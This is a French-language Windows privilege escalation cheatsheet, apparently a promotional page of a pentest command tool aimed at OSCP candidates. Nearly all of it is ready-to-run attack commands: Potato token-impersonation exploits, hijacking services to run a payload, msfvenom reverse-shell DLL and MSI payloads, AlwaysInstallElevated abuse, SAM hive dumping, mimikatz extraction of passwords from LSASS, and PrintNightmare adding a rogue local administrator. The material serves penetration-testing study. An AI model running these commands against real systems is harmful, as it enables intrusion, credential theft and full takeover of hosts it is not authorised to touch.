Windows Privilege Escalation — Cheatsheet 2026

70+ techniques pour passer d'un utilisateur à faibles privilèges à NT AUTHORITY\SYSTEM. Énumération, usurpation de token (Potato), services mal configurés, chemins non cités, AlwaysInstallElevated, DLL hijacking et exploits noyau.

Dernière mise à jour :

Débutant ? Lisez notre guide complet pour débuter et situez l'élévation de privilèges dans la méthodologie.

Navigation rapide

01 Énumération 02 Privilèges de token 03 Attaques Potato 04 Services mal configurés 05 Chemins non cités 06 Registre & AutoRuns 07 AlwaysInstallElevated 08 Chasse aux identifiants 09 Noyau & PrintNightmare 10 Outils automatisés

# Énumération initiale

Comprenez votre contexte avant tout exploit : qui vous êtes, vos privilèges, le niveau de patch et ce qui est installé.

whoami /priv
Lister les privilèges de votre token — cherchez SeImpersonate, SeBackup, SeDebug
whoami /groups
Appartenance aux groupes — êtes-vous dans un groupe privilégié ?
systeminfo
Version de l'OS, architecture et correctifs installés (pour les exploits noyau)
net user; net localgroup administrators
Utilisateurs locaux et qui est administrateur local
wmic qfe get HotFixID,InstalledOn
Historique des correctifs — à fournir à Windows Exploit Suggester
netstat -ano
Ports en écoute internes — services liés uniquement à localhost

# Privilèges de token dangereux

Certains privilèges mènent directement à SYSTEM. Énumérez avec whoami /priv et recoupez avec ce tableau.

PrivilègeExploitation
SeImpersonateAttaques Potato (PrintSpoofer, GodPotato)
SeAssignPrimaryTokenAttaques Potato
SeBackupLire les ruches SAM/SYSTEM → extraire les hash
SeRestoreÉcraser n'importe quel fichier protégé
SeDebugInjecter dans un processus SYSTEM
SeTakeOwnershipPrendre possession de n'importe quel objet
reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hive
Avec SeBackup — sauvegarder les ruches, puis extraire les hash hors ligne avec secretsdump

# Attaques Potato (SeImpersonate)

Les comptes de service (IIS, MSSQL) possèdent généralement SeImpersonatePrivilege. La famille Potato en abuse pour devenir SYSTEM.

PrintSpoofer.exe -i -c cmd
PrintSpoofer — shell SYSTEM fiable sur Windows 10/Server 2016-2019
GodPotato.exe -cmd "cmd /c whoami"
GodPotato — fonctionne sur Windows moderne dont Server 2022
JuicyPotatoNG.exe -t * -p C:\Windows\System32\cmd.exe
JuicyPotatoNG — Potato mis à jour pour les builds récents
💡 Astuce : arrivé en iis apppool\defaultapppool ou compte de service MSSQL ? Vérifiez whoami /priv — SeImpersonate y est presque toujours.

# Services mal configurés

Des permissions de service faibles permettent de remplacer le binaire ou de reconfigurer le service pour exécuter votre payload en SYSTEM.

accesschk.exe -uwcqv "Users" *
Trouver les services modifiables par votre utilisateur (SERVICE_CHANGE_CONFIG)
sc qc SERVICE_NAME
Interroger le chemin binaire et la config de démarrage d'un service
sc config SERVICE_NAME binpath= "C:\temp\rev.exe"
Reconfigurer un service faible pour exécuter votre payload
sc stop SERVICE_NAME && sc start SERVICE_NAME
Redémarrer le service pour déclencher votre payload en SYSTEM
icacls "C:\Path\To\service.exe"
Vérifier si le binaire du service est modifiable (il suffit de le remplacer)

# Chemins de service non cités

Un chemin de service avec des espaces sans guillemets permet à Windows d'exécuter un chemin partiel antérieur — déposez-y votre binaire.

wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """
Trouver les services avec des chemins non cités contenant des espaces
icacls "C:\Program Files\Some Folder\"
Vérifier l'accès en écriture à un dossier antérieur du chemin
copy rev.exe "C:\Program Files\Some.exe"
Placer votre binaire pour que Windows l'exécute à la place du vrai service

# Registre, AutoRuns & DLL Hijacking

Des clés d'autorun modifiables et des failles d'ordre de recherche des DLL permettent d'exécuter votre code à un privilège plus élevé.

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Lister les programmes en autorun — un binaire est-il modifiable ?
accesschk.exe -wvu "HKLM\...\Run"
Vérifier l'accès en écriture aux clés de registre d'autorun
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f dll -o hijack.dll
Créer une DLL malveillante pour un chemin de recherche détournable

# AlwaysInstallElevated

Si cette politique est activée, tout utilisateur peut installer un MSI en SYSTEM — victoire immédiate.

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Vérifier la clé HKLM (doit valoir 1)
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Vérifier la clé HKCU (doit aussi valoir 1)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f msi -o evil.msi
Créer un paquet MSI malveillant
msiexec /quiet /qn /i evil.msi
L'installer — s'exécute en SYSTEM quand la politique est activée

# Chasse aux identifiants

Windows stocke des mots de passe à plus d'endroits qu'on ne le croit — fichiers, registre et mémoire.

reg query HKLM /f password /t REG_SZ /s
Chercher des mots de passe stockés dans le registre
findstr /si password *.txt *.ini *.config *.xml
Chercher des identifiants en dur dans les fichiers
dir /s /b C:\Users\*unattend.xml C:\Windows\Panther\*
Les fichiers d'installation sans surveillance contiennent souvent le mot de passe admin local
cmdkey /list
Identifiants stockés — réutilisables avec runas /savecred
mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
Extraire mots de passe en clair et hash NTLM de LSASS (nécessite SYSTEM)

# Exploits noyau & PrintNightmare

Utilisez les exploits noyau en dernier recours — faites correspondre le build exact de systeminfo.

ExploitCVECible
PrintNightmareCVE-2021-1675 / 34527Service Spooler (la plupart de Windows)
HiveNightmareCVE-2021-36934SAM lisible (Win10/11)
CVE-2021-40449CallbackTableWin7 – Server 2019
CVE-2020-0787 (BITS)Déplacement arbitraire de fichierWin7 – Win10
python windows-exploit-suggester.py --database db.xls --systeminfo sysinfo.txt
Associer les correctifs manquants aux exploits noyau publics
Invoke-Nightmare -NewUser hacker -NewPassword Pass123!
PrintNightmare — ajouter un admin local via le service Spooler

# Outils d'énumération automatisés

Automatisez les vérifications — mais validez chaque résultat avant de l'exploiter.

.\winPEASx64.exe
WinPEAS — l'énumérateur privesc coloré standard
powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"
PowerUp — vérifications privesc en PowerShell
.\Seatbelt.exe -group=all
Seatbelt — inventaire des paramètres de sécurité de l'hôte
.\SharpUp.exe audit
SharpUp — portage C# des vérifications PowerUp

❓ FAQ élévation de privilèges Windows

Par l'énumération. Lancez whoami /priv et whoami /groups, puis systeminfo pour le niveau de patch. WinPEAS aide, mais l'examen OSCP récompense la maîtrise des vérifications manuelles.

Si vous possédez SeImpersonatePrivilege (courant pour les comptes IIS/MSSQL), la famille Potato (PrintSpoofer, GodPotato) en abuse pour usurper le token SYSTEM et s'exécuter en NT AUTHORITY\SYSTEM.

Quand un chemin de service a des espaces sans guillemets, Windows essaie chaque chemin partiel. Si vous pouvez écrire dans un dossier antérieur, votre binaire s'exécute avec les privilèges du service au démarrage.

Une politique permettant à tout utilisateur d'installer des MSI en SYSTEM. Si les clés HKLM et HKCU valent 1, créez un MSI malveillant avec msfvenom et lancez msiexec /quiet /i evil.msi pour un shell SYSTEM.

WinPEAS est l'outil standard. Alternatives : PowerUp (PowerShell), Seatbelt et Windows Exploit Suggester pour les correctifs manquants. Validez toujours manuellement avant d'exploiter.

SeImpersonate/SeAssignPrimaryToken (Potato), SeBackup (lire SAM), SeRestore, SeDebug et SeTakeOwnership. Vérifiez avec whoami /priv.

Avec SYSTEM, extrayez SAM/LSA avec reg save ou mimikatz sekurlsa::logonpasswords. Vous pouvez aussi dumper LSASS avec procdump/comsvcs.dll et l'analyser hors ligne avec pypykatz.

Abuser de l'ordre de recherche des DLL : si un programme privilégié charge une DLL par son nom et que vous pouvez écrire dans un dossier recherché en premier, votre DLL est chargée et s'exécute avec les privilèges du programme.

📚 Ressources liées

Rapport de pentest assisté par IA

Transformez votre compromission SYSTEM en rapport PDF professionnel. L'IA remplit CVE, CVSS et sévérité.

Essayer gratuitement →

Envie des 12 020+ commandes ?

Cette cheatsheet privesc Windows n'est qu'une branche de la carte. Pentest Mindmap organise 12 020+ commandes en 34 catégories — de la recon à la post-exploitation — avec recherche instantanée et copie en un clic.

Commencer gratuitement →